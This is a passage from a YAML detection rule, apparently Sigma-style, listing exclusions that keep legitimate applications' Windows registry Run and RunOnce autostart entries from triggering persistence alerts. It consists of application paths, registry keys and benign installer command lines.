'\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.atlassian-desktop-companion.AtlassianCompanion'\n # C:\\Users\\XXX\\AppData\\Local\\atlassian-desktop-companion\\app-1.3.1\\Atlassian Companion.exe\n Image|endswith: '\\Atlassian Companion.exe'\n\n exclusion_att_meetings:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.att.meetings'\n Details|contains: 'appdata\\local\\programs\\officeathandmeetings\\at&t office@hand meetings.exe'\n\n exclusion_sigilium:\n Image: '?:\\Windows\\System32\\reg.exe'\n ProcessParentImage|endswith: '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Sigilium Email Signatures'\n Details|contains: '\\AppData\\Local\\Programs\\sigilium-plugin\\Sigilium Email Signatures.exe'\n\n exclusion_lenovo_winsat:\n Image|endswith:\n - '\\igxpin.exe'\n - '\\Setup.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\WinSat'\n Details: 'winsat dwm -xml results.xml'\n\n exclusion_medefaultpcreset:\n Image|endswith: '\\MEDefaultPCReset.exe'\n 
ProcessSignature: 'Microsoft Corporation'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!MEDefaultPCReset'\n Details|contains: '\\AppData\\Local\\Microsoft\\BingWallpaperApp\\MEDefaultPCReset.exe'\n\n exclusion_ms_default_setup:\n Details|endswith: '\\AppData\\Local\\Microsoft\\DefaultSetup\\DefaultSetup.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!DefaultSetup'\n\n exclusion_osk:\n Image: '?:\\Windows\\System32\\osk.exe'\n ProcessSignature: 'Microsoft Windows'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\osk.exe'\n Details: 'osk.exe'\n\n exclusion_windows10upgrade:\n Image: '?:\\Windows10Upgrade\\Windows10UpgraderApp.exe'\n ProcessSignature: 'Microsoft Corporation'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!GetCurrentRollback'\n Details|contains: '?:\\Windows10Upgrade\\GetCurrentRollback.exe'\n\n exclusion_1clipboard:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\1Clipboard'\n Details: '*\\AppData\\Local\\1Clipboard\\\\*\\1Clipboard.exe*'\n\n exclusion_lifesize_reg:\n # C:\\Windows\\system32\\reg.exe ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Lifesize App Service /t REG_SZ /d \"C:\\Users\\xxxxx\\AppData\\Local\\lifesize_app\\Lifesize App Service.exe\" --path=\"C:\\Users\\xxxxxxx\\AppData\\Local\\lifesize_app\\Lifesize.exe\" --silent /f\n # details : \"C:\\Users\\xxxxxx\\AppData\\Local\\lifesize_app\\Lifesize App Service.exe\" --path=\"C:\\Users\\xxxxxx\\AppData\\Local\\lifesize_app\\Lifesize.exe\" --silent\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Lifesize App Service'\n Details|contains|all:\n - '\\lifesize_app\\Lifesize App Service.exe'\n - '\\lifesize_app\\Lifesize.exe'\n - ' --silent'\n\n exclusion_lifesize:\n # details : C:\\Users\\xxxxx\\AppData\\Local\\lifesize_app\\update.exe --processStart \"Lifesize.exe\" 
--process-start-args \"--hidden\"\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifesize_app.Lifesize'\n Details|contains|all:\n - '\\lifesize_app\\update.exe'\n - ' --process-start-args'\n - 'Lifesize.exe'\n\n exclusion_yammer:\n # details: \"C:\\Users\\xxxxxx\\AppData\\Local\\yammerdesktop\\update.exe\" --processStart \"Yammer.exe\"\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Yammer'\n Details|contains|all:\n - '\\AppData\\Local\\yammerdesktop\\update.exe'\n - 'Yammer.exe'\n\n exclusion_genuine:\n Image|endswith: '\\msiexec.exe'\n TargetObject|endswith:\n - '\\Microsoft\\Windows\\CurrentVersion\\Run\\Autodesk Genuine Service'\n - '\\Microsoft\\Windows\\CurrentVersion\\Run\\Autodesk Genuine Service ' # Space at the end\n Details:\n - '*\\Autodesk\\Genuine Service\\x64\\GenuineService.exe'\n - '%localappdata%\\Programs\\Autodesk\\Genuine Service\\GenuineService.exe'\n\n exclusion_wirelesssetup:\n Image: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\WirelessSetup.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SWComponent'\n # \"C:\\windows\\Temp\\{2F3CA705-308B-42B2-9781-7CEBF8E1F5F2}\\.cr\\WirelessSetup.exe\" -s\n Details|contains: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\WirelessSetup.exe'\n\n exclusion_seagull1:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Seagull Drivers'\n Details: 'ssdal_nc.exe startup'\n\n exclusion_marche_public:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Mon Assistant Marchés Publics'\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Mon Assistant Marchés Publics ECOLE'\n Details|contains:\n - '\\mon-assistant-marche-public\\Mon Assistant Marchés Publics.exe'\n - '\\mon-assistant-marche-public-ecole\\Mon Assistant Marchés Publics ECOLE.exe'\n\n exclusion_sepprep:\n TargetObject: 
'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\\\?' # HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\1\n Details: 'SEPprep64.exe'\n\n exclusion_webex1:\n Image|endswith: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoMeetingDaemon'\n Details|contains: '\\AppData\\Local\\WebEx\\WebexHost.exe'\n\n exclusion_rambox:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Rambox'\n # C:\\Users\\xxxxxx\\Documents\\Rambox\\Rambox-0.7.9-win-x64\\Rambox.exe / \"C:\\Users\\xxxx W\\AppData\\Local\\Programs\\Rambox\\Rambox.exe\"\n Details|contains: '\\Rambox*Rambox.exe' # in appdata or in another directory\n\n exclusion_mattermost_exe:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Mattermost'\n Details|contains: '\\appdata\\local\\programs\\mattermost-desktop\\mattermost.exe'\n\n exclusion_signitic:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Signitic'\n Details|contains: '\\Signitic\\Signitic.exe'\n\n exclusion_soti_remote_control:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SOTI Remote Control Service'\n Details|endswith: '\\AppData\\Local\\Apps\\SOTI Remote Control\\SotiRemoteControlLauncher.exe'\n\n exclusion_breitling_ewarranty:\n Image|endswith: '\\BreitlingEWarranty.exe'\n Details|endswith: '\\BreitlingEWarranty.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BreitlingEWarranty'\n\n exclusion_rainbow:\n # also seen : D:\\Profils\\xxx\\AppData\\Local\\Temp\\574\\is-A8ASG.tmp\\Rainbow_Installer.tmp\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\is-L6M7V.tmp\\Rainbow_Installer (3).tmp\n Image|contains:\n - '\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n - '\\Rainbow_Installer.tmp'\n - '\\Rainbow_Installer (?).tmp'\n Details|contains: 
'\\AppData\\Local\\Programs\\Alcatel-Lucent Enterprise\\Rainbow\\Rainbow.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Rainbow'\n\n exclusion_mwsnap:\n # http://www.mirekw.com/winfreeware/index.html\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\mwsnap'\n Details|contains:\n - '\\mwsnap\\mwsnap.exe'\n - '\\mwsnapportable\\mwsnap.exe'\n\n exclusion_infapp:\n # Intel(R) Wireless Connectivity Solutions\n Image: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\Setup.exe'\n Details: '?:\\Windows\\Temp\\{????????-????-????-????-????????????}\\.cr\\Setup.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SWComponent'\n\n exclusion_streamci:\n # rundll32.exe streamci,StreamingDeviceSetup {cfd669f1-9bc2-11d0-8299-0000f822fe8a},{0A4252A0-7E70-11D0-A5D6-28DB04C10000},{0A4252A0-7E70-11D0-A5D6-28DB04C10000},C:\\Windows\\inf\\ksfilter.inf,MSTEE.Interface.Install\n Details|startswith: 'rundll32.exe streamci,StreamingDeviceSetup '\n Image: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n\n exclusion_logibolt:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\LogiBolt'\n Image: '*\\AppData\\Local\\Logi\\LogiBolt\\LogiBolt.exe'\n Details|endswith: '\\AppData\\Local\\Logi\\LogiBolt\\LogiBolt.exe --startup'\n\n exclusion_clavier:\n Details: '*\\AppData\\Local\\Clavier?\\Clavier.exe'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Clavier?'\n\n exclusion_grammarly:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Grammarly'\n Details: '*\\AppData\\Local\\Grammarly\\DesktopIntegrations\\Grammarly.Desktop.exe'\n\n exclusion_screenpresso:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Screenpresso'\n Details|contains: '\\AppData\\Local\\Learnpulse\\Screenpresso\\Screenpresso.exe'\n\n exclusion_authenticator:\n TargetObject: 
'*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Authenticator 6'\n Details|contains: '\\authenticator6\\Authenticator 6.exe' # \\AppData\\Local\\Programs\\authenticator6\\.. or c:\\authenticator6\\..\n\n exclusion_bomgar_scc:\n # HKU\\S-1-5-21-xxxx\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar_Cleanup_ZD157689015613218\n # HKU\\S-1-5-21-xxxx\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar Support Reconnect [624BEF75]\n TargetObject|contains:\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar_Cleanup_'\n - 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar Support Reconnect '\n # details :\n # cmd.exe /C rd /S /Q \"C:\\Users\\xxxx\\AppData\\Local\\Temp\\3\\nsf89E7.tmpb\" & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_ZD355897154620360 /f\n # cmd.exe /C rd /S /Q \"d:\\profils\\xxxxr\\AppData\\Local\\Temp\\200\\nse99F8.tmpb\" & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_ZD71241960920524 /f\n # \"?:\\ProgramData\\bomgar-scc-0x6242b8b7\\bomgar-scc.exe\" -nomulti\n Details|contains:\n - '\\bomgar-scc.exe'\n - 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_ZD'\n\n exclusion_autodesk_fusion_launcher:\n # cmd /C copy /Y \"C:\\Users\\xxx\\AppData\\Local\\Autodesk\\webdeploy\\production\\19107935ce2ad08720646cb4a31efe37d8a5f41b\\FusionLauncher.exe\" \"C:\\Users\\xxxx\\AppData\\Local\\Autodesk\\webdeploy\\production\\6a0c9611291d45bb9226980209917c3d\\FusionLauncher.exe\"\n Details: 'cmd /C copy /Y *\\AppData\\Local\\Autodesk\\webdeploy\\production*FusionLauncher.exe*'\n\n exclusion_update_checker:\n # details: C:\\Users\\xxxx\\AppData\\Local\\Apps\\2.0\\AAOL97KH.5T2\\EYW08NNP.BG0\\upda..tion_d618ae9fc43a22ce_0001.0000_bb623013ee6c2931\\Update Checker.exe\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update Checker'\n Details|endswith: '\\Update Checker.exe'\n\n 
exclusion_enhanced_edge:\n TargetObject:\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!MEDefaultPCReset'\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\!BrowserSettingsInstaller'\n Details|contains:\n - '*\\AppData\\Local\\Microsoft\\EnhanceEdge\\MEDefaultPCReset.exe'\n - '*\\AppData\\Local\\Microsoft\\EnhanceEdge\\BrowserSettingsInstaller.exe'\n\n exclusion_adobe_connectdetector:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ConnectDetector'\n Details|contains: 'AppData\\Roaming\\Adobe\\Connect\\connectdetector.exe'\n\n exclusion_samsung:\n Image: '?:\\Windows\\Samsung\\PanelMgr\\SSMMgr.exe'\n Details: '?:\\Windows\\Samsung\\PanelMgr\\SSMMgr.exe /autorun'\n TargetObject: 'HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Samsung PanelMgr'\n\n exclusion_dell_dbrm_tray:\n TargetObject:\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\DBRMTray'\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\DBRMTray'\n Details|contains:\n - '\\DBRM\\Reminder\\TrayApp.exe'\n - '\\DBRM\\Reminder\\DbrmTrayIcon.exe'\n\n exclusion_rnp_panel_manager:\n TargetObject:\n - 'HKLM\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\RNP PanelMgr'\n - 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\RNP PanelMgr'\n Details|contains: '?:\\windows\\RNP\\PanelMgr\\SSMMgr.exe'\n\n exclusion_bing_svc:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BingSvc'\n Details|contains: '\\AppData\\Local\\Microsoft\\BingSvc\\BingSvc.exe'\n\n exclusion_bing_service:\n Image: '?:\\Windows\\Temp\\MUBSTemp\\BGAStartMSILauncher.EXE'\n ProcessSignature: 'Microsoft Corporation'\n Details|contains: '?:\\Windows\\Temp\\MUBSTemp\\BGAStartMSI.EXE'\n\n exclusion_eolis:\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\EPS Setup Restart'\n Details|contains|all:\n - '\\Evolis\\Setup_Evolis_Premium_Suite.exe'\n - '?:\\ProgramData\\Evolis 
Premium SuiteRst\\param.dat'\n\n exclusion_signalrgb:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SignalRgb'\n Details|contains|all:\n - '?:\\Users\\\\*\\AppData\\Local\\VortxEngine\\SignalRgbLauncher.exe'\n - '--silent'\n\n exclusion_zamzar:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Zamzar.Zamzar'\n Details: '?:\\Users\\\\*\\AppData\\Local\\Zamzar\\app-*\\Zamzar.exe'\n\n exclusion_lifen:\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.lifen.Lifen'\n Details|endswith: '\\Update.exe --processStart ?Lifen.exe? --process-start-args ?--hidden?'\n\n exclusion_typingmaster:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\TypingMaster*\\QuickPhrase\\qphrase.exe'\n Details|contains: '?:\\Users\\\\*\\AppData\\Local\\Programs\\TypingMaster*\\QuickPhrase\\qphrase.exe\"'\n\n exclusion_varian:\n ProcessImage: '?:\\ProgramData\\VDT.exe'\n ProcessOriginalFileName: 'VarianDeploymentTool.exe'\n Details: 'cmd /c \"start /d \"?:\\ProgramData\" VDT.exe /STOREPATH:\"?:\\ProgramData\\RSDInstaller\" /RESUME\"'\n\n exclusion_polylens:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n Details|startswith: '?:\\Users\\\\*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n\n exclusion_modjo:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Modjo_Taking-Note\\\\*\\modjo-livenotes.exe'\n Details|contains: '?:\\Users\\\\*\\AppData\\Local\\Modjo_Taking-Note\\Update.exe --processStart \"modjo-livenotes.exe\" --process-start-args \"--hidden\"'\n\n exclusion_actisync:\n Details|contains: 'AppData\\Local\\ActiGraph\\ActiSync\\ActiSync.exe'\n TargetObject|endswith: 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ActiSync'\n\n exclusion_keyacc32:\n TargetObject|endswith: 'Microsoft\\Windows\\CurrentVersion\\Run\\KeyAccess'\n Details: 'kass.exe'\n ProcessImage: '?:\\Windows\\keyacc32.exe'\n\n exclusion_smallpdf:\n 
TargetObject|endswith: 'Software\\Microsoft\\Windows\\CurrentVersion\\Run\\com.squirrel.Smallpdf.Smallpdf'\n Details|contains: 'AppData\\Local\\Smallpdf\\Smallpdf.exe'\n\n exclusion_windowsmobile:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n Details: '%windir%\\WindowsMobile\\wmdc.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Mobile Device Center'\n\n exclusion_googleupdater:\n # C:\\Users\\xxx\\AppData\\Local\\Temp\\Google12936_775496257\\bin\\updater.exe\n ProcessImage|endswith: '\\updater.exe'\n ProcessSignature: 'Google LLC'\n Details: '*\\AppData\\Local\\Google\\GoogleUpdater\\\\*\\updater.exe*'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleUpdaterTaskUser*'\n\n exclusion_ghosts:\n Image|endswith: '\\ghosts.exe'\n ProcessDescription: 'GHOSTS NPC Orchestrator'\n\n exclusion_launcher_easy:\n Image|endswith: '\\LAUNCHEREASY.EXE'\n ProcessSignature: 'GINKOIA SAS'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\Launch_Replication'\n\n exclusion_msteams_uninstall:\n Image|endswith:\n - '\\msteams.exe'\n - '\\ms-teamsupdate.exe'\n ProcessSignature: 'Microsoft Corporation'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\UninstallT??'\n\n exclusion_bluestacks:\n Image|endswith: '\\BlueStacksServices.exe'\n ProcessSignature: 'Now.gg, INC'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\Run\\electron.app.BlueStacks Services'\n\n exclusion_manageengine:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\ManageEngine\\UEMS_Agent\\dcconfig.exe'\n\n exclusion_installer:\n ProcessCommandLine:\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_* SetupGen!CustomActions.AfterInstall'\n - 'rundll32.exe ?:\\windows\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_* CustomActions!CustomActions.CustomActions.KillProcess'\n - 'rundll32.exe 
?:\\WINDOWS\\Installer\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_* CustomAction1!CustomAction1.CustomActions.UninstallMiniFilterDriver'\n\n exclusion_legitimate_applications:\n - Details: 'Binary Data'\n TargetObject: 'HKLM\\Software\\microsoft\\appv\\client\\packages\\6b2efa10-7858-47e5-8d4b-f23e603cdd38\\versions\\65d45509-5367-416a-af65-17de8a726c38\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\run\\sunjavaupdatesched'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\appv\\client\\packages\\\\*\\versions\\\\*\\registry\\user\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\adobeupdater\\(default)'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\run\\sunjavaupdatesched'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\software\\microsoft\\appv\\client\\packagegroups\\\\*\\registry\\user\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\microsoftedgeautolaunch_*'\n - Details: 'Binary Data'\n TargetObject: 'HKU\\\\*\\software\\microsoft\\appv\\client\\packages\\\\*\\registry\\user\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\microsoftedgeautolaunch_*'\n - Details: 'cmd /c if /i not %username%==sbsadmin start ?:\\\"program files\"\\illumina\\\"miniseq control software\"\\startcontrolsoftware.bat'\n TargetObject: 'hku\\.default\\Software\\Microsoft\\Windows\\currentversion\\group policy objects\\{*}machine\\Software\\Microsoft\\Windows\\currentversion\\policies\\explorer\\run\\1'\n - Details: '\"?:\\ProgramData\\akio\\tws_client\\current\\tws.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\twsv5'\n - Details: '\"?:\\ProgramData\\akio\\tws_client_tws_akio_cloud\\current\\tws.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\currentversion\\run\\twsv5'\n - Details: 
'\"?:\\ProgramData\\comms\\pcmanager\\driverupgrade\\update\\downloaded\\\\*\\pcmanager_setup_*.exe\"'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\pcmanagersetup'\n - Details: '\"?:\\ProgramData\\microsoft\\windows\\start menu\\programs\\citrix\\receiver updater.lnk\"'\n TargetObject: 'HKLM\\Software\\wow6432node\\microsoft\\windows\\Currentversion\\Run\\citrixreceiver'\n - Details: '?:\\ProgramData\\tracker software\\trackerupdate\\trackerupdate.exe -startinstall'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Runonce\\trackerupdate'\n - Details: '\"?:\\ProgramData\\wargaming.net\\gamecenter\\wgc.exe\" --background'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\wargaming.net game center'\n - Details: '\"?:\\sources\\stockage\\keypirinha\\keypirinha.exe\" --autorun'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\keypirinha'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\adista\\prod-*\\myistraadista\\myistraadista.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistraadista'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\apps\\\\*\\avmautostart.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\avmusbfernanschluss'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\aver\\aver ptzapp\\aver ptzapp\\ecam.exe -background'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ptzapp'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\avg\\browser\\application\\avgbrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"default\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\avgbrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\avira\\browser\\application\\avirabrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"default\"'\n 
TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\avirabrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\btblue\\molene-bretagne\\myistrabtblue\\myistrabtblue.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistrabtblue'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\ccleaner browser\\application\\ccleanerbrowser.exe\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\"default\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\ccleanerbrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\clavier+\\clavier.exe\" /launch'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\clavier+'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\cliq\\update.exe --processstart \"cliq.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\com.squirrel.cliq.cliq'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\com.doko.winx\\doko-phone.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\doko-phone'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\ecosiabrowser\\application\\ecosiabrowser.exe\" --no-startup-window /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\googlechromeautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\element-desktop\\update.exe\" --processstart \"element.exe\" --process-start-args \"--hidden\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\element'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\episoftware\\epibrowser\\application\\epibrowser.exe\" --from-registry'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\epibrowserstartup'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\episoftware\\epibrowser\\application\\epibrowser.exe\" --no-startup-window --existing-window /prefetch:5'\n TargetObject: 
'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\epibrowserautolaunch_*'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\episoftware\\epibrowser\\application\\epibrowser.exe\" --update'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\epibrowserupdate'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\fenetre\\fenetre capture tool\\fenetrecapturetool.exe /startminimized'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\fenetrecapturetool'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\fingerprint\\fingerprint-fde\\myistra\\myistra.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\myistra'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\gamejoltclient\\gamejoltclient.exe\" run -- --silent-start'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\gamejoltclient'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\google\\update\\\\*\\googleupdatecore.exe\"'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\google update'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\hubone\\hubonepp\\mycallpp\\mycallpp.exe\" -startwithos'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\mycallpp'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\mathworks\\servicehost\\v*\\bin\\win64\\matlabconnector.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\matlab connector'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\microsoft\\edge dev\\application\\msedge.exe\" --no-startup-window --win-session-start'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\microsoftedgeautolaunch_*'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\mixesoft\\appnhost\\appnhost.exe'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\appnhost'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\nordvpn\\updates\\channel-*\\\\*\\\\*.exe 
/silent /verysilent'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Runonce\\nordvpn update'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\onelaunch\\\\*\\chromium\\chromium.exe\" --no-startup-window /prefetch:5'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\googlechromeautolaunch_*'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\onelaunch\\\\*\\onelaunch.exe /startedfrom=registry'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onelaunch'\n - Details: '?:\\Users\\\\*\\AppData\\Local\\onelaunch\\\\*\\chromiumstartupproxy.exe--tab-trigger=systemstart'\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Windows\\Currentversion\\Run\\onelaunchchromium'\n - Details: '\"?:\\Users\\\\*\\AppData\\Local\\oneop\\gto_fde\\oneapp\\oneapp.exe\" 